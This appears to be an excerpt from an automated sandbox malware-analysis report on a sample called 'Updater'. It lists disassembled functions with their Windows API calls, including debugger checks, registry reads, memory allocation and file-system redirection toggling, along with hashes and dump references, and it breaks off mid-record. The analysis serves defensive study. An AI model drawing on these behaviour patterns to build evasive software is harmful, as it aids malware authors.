Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: fff8be23245b18c2cc647b91881ba81b40441aecda3f2428e93d5df9ffb4bec3
Instruction ID: 0fb0aef74465c41209670360159ff4e0ba00389c9ccf3cda70e725df37b298c9
Opcode Fuzzy Hash: fff8be23245b18c2cc647b91881ba81b40441aecda3f2428e93d5df9ffb4bec3
Instruction Fuzzy Hash: 6F31A0B0948344AFEB328F248885BE6BBECDF06704F1044DAE5AE97241DB741A84CB55

Function 00B584DE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00B583FC,?,00BE9910,0000000C), ref: 00B58534
GetLastError.KERNEL32(?,00B583FC,?,00BE9910,0000000C), ref: 00B5853E
__dosmaperr.LIBCMT ref: 00B58569

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 6fd9bb02044b69f7a8c4a88d988c1c79b9f798d3fabb717af69e10f1cef59b43
Instruction ID: 013b2c11bd2df97966cf478d99b3a3589030bc0e38b7eaf545e727f4af1fdc8b
Opcode Fuzzy Hash: 6fd9bb02044b69f7a8c4a88d988c1c79b9f798d3fabb717af69e10f1cef59b43
Instruction Fuzzy Hash: 5E016B32A0556016D62523787C4673E6BC6CF92737F2442D8FC14BB2D3EEA0CC8D8161

Function 014071CD Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 01407213
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 0140723A
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 0140725F

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction ID: 7dc7d5f7e0339f44a83c6fca0c0678c3874b4547449744741c9513d5141696f2
Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction Fuzzy Hash: 4B117371A0020DABCB11EA9DDC81EEFB7BCAF48214F00006AE615E3240DB749A448BA1

Function 00B591BB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B5926A,FF8BC369,00000000,00000002,00000000), ref: 00B591F4
GetLastError.KERNEL32(?,00B5926A,FF8BC369,00000000,00000002,00000000,?,00B5598F,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B46AFC), ref: 00B591FE
__dosmaperr.LIBCMT ref: 00B59205

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 57f5b1598236b295fd83137e0abcad1213338e8e716ff7358121fd57ce649863
Instruction ID: 0ff27289af424e131e5700157dec498d1dd3d80578adfa55c8973b907afc8341
Opcode Fuzzy Hash: 57f5b1598236b295fd83137e0abcad1213338e8e716ff7358121fd57ce649863
Instruction Fuzzy Hash: C8012832610515BBCB059FA9DC05A6E7FA9EB85332B2402C8FC10AB290EB719D00C7A0

Function 00B24293 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 463COMMON

Download Yara Rule

Strings

CALL, xrefs: 00B6350E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: b533f8c2fcd206d7c9c04df0cf4997f6f57b19c27345f8231068492a0fc57f2d
Instruction ID: ac5424f6f19d73d9a4388e98c81428ca8fad1d7009a6f5669131e32136cbea42
Opcode Fuzzy Hash: b533f8c2fcd206d7c9c04df0cf4997f6f57b19c27345f8231068492a0fc57f2d
Instruction Fuzzy Hash: 42128770508311CFCB24DF24D480B6ABBE1FF84700F2489ADE99A8B361DB75E945CB82

Function 00B28E00 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B290D4

Strings

CALL, xrefs: 00B290A4

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 222718b356704f2d486692436615cf3f0b282e24081e364bdd2e599a9cdfd65d
Instruction ID: a347cf2784ebd72ae97dfa2f0304515757f8536e5452282d3e80fe56c4c8f6ac
Opcode Fuzzy Hash: 222718b356704f2d486692436615cf3f0b282e24081e364bdd2e599a9cdfd65d
Instruction Fuzzy Hash: 1491AEB0108215DFCB10DF14D880B2ABBE1FF84314F14899CE9995B3A2CB76E955CF92

Function 00B310B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00B771AE

Part of subcall function 00B2119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B21192,?), ref: 00B211BF

Part of subcall function 00B3FDB9: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B3FDD8

Strings

X, xrefs: 00B7717C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 8097d16c7689238345da33570709af90904c49babc4000939f73e0dd1da4dd8a
Instruction ID: 2e3c13acc4a3516e0d6be7f9579e5dca21daa706e48c672aeab9523b3895aa3e
Opcode Fuzzy Hash: 8097d16c7689238345da33570709af90904c49babc4000939f73e0dd1da4dd8a
Instruction Fuzzy Hash: 0221D571A14298ABCB01DF98DC457EE7BFD9F48710F10809AE908F7241DFB45A898FA5

Function 00B31E10 Relevance: 3.1, APIs: 2, Instructions: 65fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,00000000,?,?,00B2C03B), ref: 00B31E6E
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00008000,00000000,?,00000000,?,?,00B2C03B), ref: 00B31EA7

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 8f13128eaed684e25f2caf4f2f33e22fb5a9fee38dd678e518ccf47d5c0b0940
Instruction ID: 320a746819024d756f8369faf5e553fe772b6263e51c6e57bb828df399830e43
Opcode Fuzzy Hash: 8f13128eaed684e25f2caf4f2f33e22fb5a9fee38dd678e518ccf47d5c0b0940
Instruction Fuzzy Hash: 23214735200715AFD720CF19C884B66B7F9FF08710F20896DE9AA97690DBB2F945CB60

Function 00B400D3 Relevance: 3.1, APIs: 2, Instructions: 58COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B91DC1,?,753CE610), ref: 00B400F0
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B80B20,00000000,00000000,?,?,00B91DC1,?,753CE610,?,00B80B20), ref: 00B40117

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: ab727228a5a077134a743cd356979c9180f2d8788dd060817f87dde31d38954b
Instruction ID: 1d11df188723dbde8de5ee9a59d330c06a813112dada0775ae8c4627aa8dcd59
Opcode Fuzzy Hash: ab727228a5a077134a743cd356979c9180f2d8788dd060817f87dde31d38954b
Instruction Fuzzy Hash: 250186B5624104BFAB1C6B69DC0AC7F7AEDDF8631071043ADB605D3211E9B5AD00D674

Function 00B31EE8 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B2C025,?,00008000), ref: 00B31F16
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00B2C025,?,00008000), ref: 00B77483

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ce51a5b4be5656185842e3d94ce1d738d8e8ca615aacb0c142bf1c8d08a2cc2
Instruction ID: af1c3ad12e7d0590d9ed5126c4bb8ac47219e074f28ae1b1880f51bf4d58f3e5
Opcode Fuzzy Hash: 2ce51a5b4be5656185842e3d94ce1d738d8e8ca615aacb0c142bf1c8d08a2cc2
Instruction Fuzzy Hash: 03015230245225B6E7315A2ECC0EF977F98EF02B74F208350BAAD6E1E1CBB45854CB90

Function 00B3FC28 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00B3FC4A

Part of subcall function 00B3FC98: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B3FCAD
Part of subcall function 00B3FC98: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B3FCC4

Part of subcall function 00B32D33: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B32D63
Part of subcall function 00B32D33: IsDebuggerPresent.KERNEL32 ref: 00B32D76
Part of subcall function 00B32D33: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B32DE2
Part of subcall function 00B32D33: SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00B32E63

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00B3FC84

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 63e07966168a0ebc7467ba4b789f432bd0330bea913c6cb7692984bc502dd242
Instruction ID: 4fd15d3b9dac7fdd41cda5923a028d2c7182bcad4f5394158d639881c2a0c38f
Opcode Fuzzy Hash: 63e07966168a0ebc7467ba4b789f432bd0330bea913c6cb7692984bc502dd242
Instruction Fuzzy Hash: 86F058B2984309AFE700AB64ED0AB793BE4F714711F604865F5054B0E2DFB995A1DB88

Function 01407802 Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140787B
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01407881

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 1e80be486bc3b2ed8a3ba8aaa4fdb2bdd21a7b2b240338967a6da44621a3724a
Instruction ID: c422f8d1e874f2ff0b71d2e3f1878a62310895a55a8fb1d071bdfd8a82a48a05
Opcode Fuzzy Hash: 1e80be486bc3b2ed8a3ba8aaa4fdb2bdd21a7b2b240338967a6da44621a3724a
Instruction Fuzzy Hash: 13E04F76904205BEE700EFADDCC0EAEB7ECEF44315F60447AB644D2140DA34AA04CB20

Function 0140A805 Relevance: 3.0, APIs: 2, Instructions: 5COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0140AB65,00000000,0140AB80,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0140A807
TerminateProcess.KERNEL32(00000000,00000000,0140AB65,00000000,0140AB80,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0140A80D

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
Instruction ID: 389e514e9f05f663b1b5477e0c9a2d1a732e15e3fd9370e95a3f347511fa925e
Opcode Fuzzy Hash: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
Instruction Fuzzy Hash: B2900245A4520210D84032B80956F2A44083F6150AFC00458D30595484889D80488131

Function 013EECA5 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,013EF038), ref: 013EECD4
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,013EF038), ref: 013EECFB

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b6a2b832005600107881752b35e29ba6e154abcbaa90f7127e9cf256b8b648f4
Instruction ID: e5458116b0f61cec3538ea706e41d25a618345ec4a55d3c5b5e489b060dbb611
Opcode Fuzzy Hash: b6a2b832005600107881752b35e29ba6e154abcbaa90f7127e9cf256b8b648f4
Instruction Fuzzy Hash: 7FF027B3B007315BEB21566D4C8CF5359C6AF45BA4F090070FA08EF3C8D2724C0142A1

Function 00B237F2 Relevance: 2.1, APIs: 1, Instructions: 616COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ad0378dc10b1487367920f55b646ad39d91c8eeb5a914ce7956f348844c29b
Instruction ID: 21eddbe9e89f41a7e712836e5dfdf54874deda4328d064be3eb129f37387eead
Opcode Fuzzy Hash: b4ad0378dc10b1487367920f55b646ad39d91c8eeb5a914ce7956f348844c29b
Instruction Fuzzy Hash: A1423A74A08351CFC764CF19D09062AB7F1FB99B04F2489ADE5898B350D779EE81DB82

Function 00B26980 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B26DBE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 9da4457c54812f319e2bbed703dd75bc70682df5f862f98e200b1442116fc7bd
Instruction ID: 51ca3a4f3df9174567af7a766dd112a4cf14289585fb86d79c576c2432e64d62
Opcode Fuzzy Hash: 9da4457c54812f319e2bbed703dd75bc70682df5f862f98e200b1442116fc7bd
Instruction Fuzzy Hash: 7E32CF75A00229DFCB14DF58D885ABAB7F5FF44304F1580E9E919AB251CB38EE81CB91

Function 00B4EC36 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92928b79464f717f08cb06dca36da127a5841f7f9e7883d295650ba60f9a0f59
Instruction ID: e80dcd04dd29253121cf058a986878f43bd99067f1fa7ee2469cbbe33670600f
Opcode Fuzzy Hash: 92928b79464f717f08cb06dca36da127a5841f7f9e7883d295650ba60f9a0f59
Instruction Fuzzy Hash: C9519471E00114AFDB10DF68C884B697BE5FF85364F1985E8E8689B391C771EE42DB90

Function 00B90156 Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B9016F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 36ae167f14954d2b5a9061c7378b9031645e204774c870315acf98fd455f38f0
Instruction ID: 491caec133c9352a33b785e7e19ce902a2e5512f36a9b658f4674df6ad7f2001
Opcode Fuzzy Hash: 36ae167f14954d2b5a9061c7378b9031645e204774c870315acf98fd455f38f0
Instruction Fuzzy Hash: 7641B176910209AFDF15EFA4D8809AEB7F9FF44310B1085BEE91697251EB70DE04CB50

Function 00B402C0 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 00B4036F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 170c5ba5c4dc1fc9145291f16be3baebbcadf2c4b771f15632659efc3f9f8a47
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8931E2B0A10105DBC718EF58C484A6DFBF6FB49304B2486E5E609CB256E731EEC1EB84

Function 00B327CA Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3290F: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3291B
Part of subcall function 00B3290F: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B3292D
Part of subcall function 00B3290F: FreeLibrary.KERNEL32(00000000,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3293F

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B3058E,?,00000001), ref: 00B327FC

Part of subcall function 00B328D8: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B328E1
Part of subcall function 00B328D8: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B328F3
Part of subcall function 00B328D8: FreeLibrary.KERNEL32(00000000,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B32906

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: df02180e726bdde9caae61b66103b4054116374e854da840bfb197a10209e4fd
Instruction ID: f4b719642d4f80ebfc9034f904c06fc3b4f8417c581adba43e41c9f524805b68
